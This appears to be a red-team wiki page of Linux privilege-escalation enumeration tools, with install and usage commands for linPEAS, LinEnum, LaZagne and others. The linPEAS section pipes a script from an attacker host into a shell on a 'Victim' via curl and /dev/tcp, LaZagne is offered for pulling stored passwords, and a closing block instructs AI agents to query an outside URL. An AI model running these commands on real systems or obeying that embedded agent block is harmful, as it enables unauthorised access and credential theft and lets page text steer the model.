# Automated Checks ## `Linux Priv Esc Bible` | {% embed url="" %} {% embed url="" %} ### If wget doesn't work : ```bash cat > les.sh This file was created using cat (^._.^) # Hit Ctrl+D to exit! ``` ## `linux-exploit-suggester` {% embed url="" %} ```bash # install wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh # usage ./les.sh ``` ## `linux-smart-enumeration` {% embed url="" %} ```bash # install wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh # usage # shows interesting information that should help you to privesc ./lse.sh -l1 # dump all the information it gathers about the system ./lse.sh -l2 ``` ## `linPEAS` {% embed url="" %} ```bash # install wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh # COMMANDS # Local network # On the Host sudo python -m SimpleHTTPServer 80 # On the Victim curl $ip/linpeas.sh | sh # Without curl # On the Host sudo nc -q 5 -lvnp 80 < linpeas.sh # On the Victim cat < /dev/tcp/10.10.10.10/80 | sh # USAGE #all checks - deeper system enumeration, but it takes longer to complete. ./linpeas.sh -a # superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk. ./linpeas.sh -s #Password - Pass a password that will be used with sudo -l and bruteforcing other users ./linpeas.sh -P ``` ## `linuxprivchecker` {% embed url="" %} ```bash # INSTALL wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py # python 2.6/2.7 python linuxprivchecker.py -w -o linuxprivchecker.log # python 3.x pip install linuxprivchecker # USAGE linuxprivchecker -w -o linuxprivchecker.log # or python3 -m linuxprivchecker -w -o linuxprivchecker.log ``` ## `LinEnum` {% embed url="" %} ```bash # install git clone https://github.com/rebootuser/LinEnum.git # usage ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t ``` ## `LaZagne` {% embed url="" %} > Retrieve lots of passwords stored on a local computer. ```bash # install git clone https://github.com/AlessandroZ/LaZagne.git cd LaZagne pip install -r requirements.txt cd Linux/ # usage python laZagne.py ``` ## `unix-privesc-check` {% embed url="" %} ```bash chmod +x unix-privesc-check ./unix-privesc-check > checks.txt ``` ## `pwncat` {% embed url="" %} ### Usage ```bash # enumeration run enumerate # to enumerate the whole server run enumerate.file.caps # to enumerate linux capabilities run enumerate.file.suid # to enumerate suid files ``` ![image](https://github.com/buger-shack/scriptkiddie/assets/61053314/c28b3cf6-66ed-46e2-bb64-7c8455e35e82) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.redsquad.xyz/linux-hacking/privilege-escalation/automated-checks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.